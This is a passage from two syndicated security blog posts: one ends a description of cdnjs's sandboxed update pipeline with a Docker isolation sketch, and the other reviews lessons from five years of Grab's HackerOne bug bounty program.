The main idea behind the redesign of the pipeline was to move away from the monolithic auto-update process. Instead, various operations are done using microservices or daemons which have well-defined scopes. Here’s an overview of the steps:

First, to detect new library versions, two daemons (one for npm-based and one for git-based updates) run regularly. Once a new version has been detected, the files are downloaded as an archive and placed into the incoming storage bucket.

Writing a new version in the incoming bucket triggers a function that adds all the information we need to update the library. The function also generates a signed URL allowing for writing in the outgoing bucket, but only in a specific folder for a given library, reducing the blast radius. Finally, a message is placed into a queue to indicate that the new version of the given library is ready to be published.

A daemon listens for incoming messages and spawns an unprivileged Docker container to handle dangerous operations (archive extraction, minifications, and compression). After the sandbox exits, the daemon will use the signed URL to store the processed files in the outgoing storage bucket.
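As a rough sketch of that step (the flags, image name, and entrypoint arguments here are assumptions for illustration, not Cloudflare’s actual configuration), the daemon could launch the sandbox like this:

import subprocess

def run_sandboxed_update(library: str, archive_path: str, workdir: str) -> int:
    """Process one library update inside an ephemeral, unprivileged container."""
    command = [
        "docker", "run", "--rm",
        "--network", "none",       # no network access inside the sandbox
        "--cap-drop", "ALL",       # drop all Linux capabilities
        "--user", "65534:65534",   # run as an unprivileged user (nobody)
        "--read-only",             # read-only root filesystem
        "-v", f"{workdir}:/work",  # only this library's working directory is writable
        "cdnjs-sandbox:latest",    # hypothetical sandbox image
        "process-library", library, archive_path,  # hypothetical entrypoint
    ]
    return subprocess.run(command, check=False).returncode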

Finally, multiple daemons are triggered when the finalized package is written to the outgoing bucket. These daemons publish the assets to cdnjs.cloudflare.com and to the main cdnjs repository. The daemons also publish the version specific URL, cryptographic hash, and other information to Workers KV, cdnjs.com, and the API.

In this revised design, exploiting a similar vulnerability would happen in the sandbox (Docker container) context. The attacker would have access to container files, but nothing else. The container is minimal, ephemeral, has no secrets included, and is dedicated to a single library update, so it cannot affect other libraries’ files.

Our Commitment to Security

Beyond maintaining a vulnerability disclosure program, we regularly perform internal security reviews and hire third-party firms to audit the software we develop. But it is through our vulnerability disclosure program that we receive some of the most interesting and creative reports. Each report has helped us improve the security of our services. In this case, we worked with RyotaK to not only address the vulnerability, but to also ensure that their blog post was detailed and accurate. We invite those that find a security issue in any of Cloudflare’s services to report it to us through HackerOne.

Reflecting on the five years of Bug Bounty at Grab

Post Syndicated from Grab Tech original https://engineering.grab.com/reflecting-on-the-five-years-of-bug-bounty-at-grab

Security has always been a top priority at Grab; our product security team works round the clock to ensure that our customers’ data remains safe. Five years ago, we launched our private bug bounty program on HackerOne, which evolved into a public program in August 2017. The idea was to complement the security efforts our team has been putting in to keep Grab secure. We were a pioneer in Southeast Asia in implementing a public bug bounty program, and now we stand among the top 20 programs on HackerOne worldwide.

We started with a private bug bounty program, which provided us with fantastic results and encouraged us to increase our reach and benefit from the vibrant security community across the globe, which has helped us iron out security issues in our products and infrastructure around the clock. We then publicly launched our bug bounty program, offering competitive rewards; hackers can even earn additional bonuses if their report is well written and displays an innovative approach to testing.

In 2019, we also enrolled in the Google Play Security Reward Program (GPSRP). Offered by Google Play, GPSRP allows researchers to re-submit their resolved mobile security issues directly and earn additional bounties if the report qualifies under the GPSRP rules. A selected number of Android applications are eligible, including Grab’s Android mobile application. Through our participation in GPSRP, we hope to give researchers the recognition they deserve for their efforts.

In this blog post, we share our journey of running a bug bounty program, the challenges involved, and the lessons we learned along the way, to help other companies in SEA and beyond establish and build a successful bug bounty program.

Transitioning from Private to a Public Program

At Grab, before starting the private program, we defined the policy and scope, allowing us to communicate the objectives of our bug bounty program and list the targets that can be tested for security issues. We did a security sweep of the targets to eliminate low-hanging security issues, assigned people from the security team to take care of incoming reports, and then launched the program in private mode on HackerOne with a few chosen researchers who had demonstrated a history of quality submissions.

One of the benefits of running a private bug bounty program is having some control over the number of incoming submissions and over which researchers can report issues. This ensures the quality of submissions and helps control the volume of bug reports, so that a possibly small security team isn’t overwhelmed by a deluge of issues. The researchers invited to the program are limited in number, and it is possible to invite researchers with a known track record or a specific skill set, further working in the program’s favour.

The results and lessons from our private program were valuable, making our program and processes mature enough to open the bug bounty program to security researchers across the world. We still did another security sweep, reworded the policy, redefined the targets by expanding the scope, and allocated enough folks from our security team to take on the initial inflow of reports, which was anticipated to be in line with other public programs.

Submissions

Noticeable spike in the number of incoming reports as we went public in July 2017.

Lessons Learned from the Public Program

Although we had been running our bug bounty program in private for some time before going public, we still had not worked much on building standard operating procedures and processes for managing it until early 2018. Listed below are our key takeaways from 2018 through July 2020 in terms of improvements, challenges, and other insights.

  1. Response Time: No researcher wants to work with a bug bounty team that doesn’t respect the time that they are putting into reporting bugs to the program. We initially didn’t have a formal process around response times, because we wanted to encourage all security engineers to pick up reports. Still, we have been consistently delivering a first response to reports in a matter of hours, which is significantly lower than the response times of the top 20 bug bounty programs running on HackerOne. Know what structured (or unstructured) processes work for your team in this area, because your program can see significant rewards from fast response times.
  2. Time to Bounty: In most bug bounty programs the payout for a bug is made in one of the following ways: full payment after the bug has been resolved, full payment after the bug has been triaged, or paying a portion of the bounty after triage and the remaining after resolution. We opt to pay the full bounty after triage. While we’re always working to speed up resolution times, that timeline is in our hands, not the researcher’s. Instead of making them wait, we pay them as soon as impact is determined to incentivize long-term engagement in the program.
  3. Noise Reduction: With HackerOne Triage and Human-Augmented Signal, we’re able to focus our team’s efforts on resolving unique, valid vulnerabilities. Human-Augmented Signal flags any reports that are likely false-positives, and Triage provides a validation layer between our security team and the report inbox. Collaboration with the HackerOne Triage team has been fantastic and ultimately allows us to be more efficient by focusing our energy on valid, actionable reports. In addition, we take significant steps to block traffic coming from networks running automated scans against our Grab infrastructure and we’re constantly exploring this area to actively prevent automated external scanning.
  4. Team Coverage: We introduced a team scheduling process, in which we assign a security engineer (chosen during sprint planning) on a weekly basis, whose sole responsibility is to review and respond to bug bounty reports. We have integrated our systems with HackerOne’s API and PagerDuty to ensure alerts are for valid reports and verified as much as possible.

Looking Ahead

One area where we haven’t been doing too well is ensuring higher rates of participation in our core mobile applications; some of the pain points researchers have told us about while testing our applications are:

  • Researchers’ accounts are getting blocked due to our anti-fraud checks.
  • Researchers are not able to register driver accounts (which is understandable, as our driver-partners have to go through a manual verification process).
  • Researchers who are not residing in the Southeast Asia region are unable to complete end-to-end flows of our applications.

We are open to community feedback and how we can improve. We want to hear from you! Please drop us a note at [email protected] for any program suggestions or feedback.

Last but not least, we’d like to thank all researchers who have contributed to the Grab program so far. Your immense efforts have helped keep Grab’s businesses and users safe. Here’s a shoutout to our program’s top-earning hackers 🏆:

Ranking  Overall Top 3 Researchers  Year 2019/2020 Top 3 Researchers
1        @reptou                    @reptou
2        @quanyang                  @alexeypetrenko
3        @ngocdh                    @chaosbolt

Lastly, here is a special shoutout to @bagipro who has done some great work and testing on our Grab mobile applications!

Well done and from everyone on the Grab team, we look forward to seeing you on the program!

Join us

Grab is more than just the leading ride-hailing and mobile payments platform in Southeast Asia. We use data and technology to improve everything from transportation to payments and financial services across a region of more than 620 million people. We aspire to unlock the true potential of Southeast Asia and look for like-minded individuals to join us on this ride.

If you share our vision of driving South East Asia forward, apply to join our team today.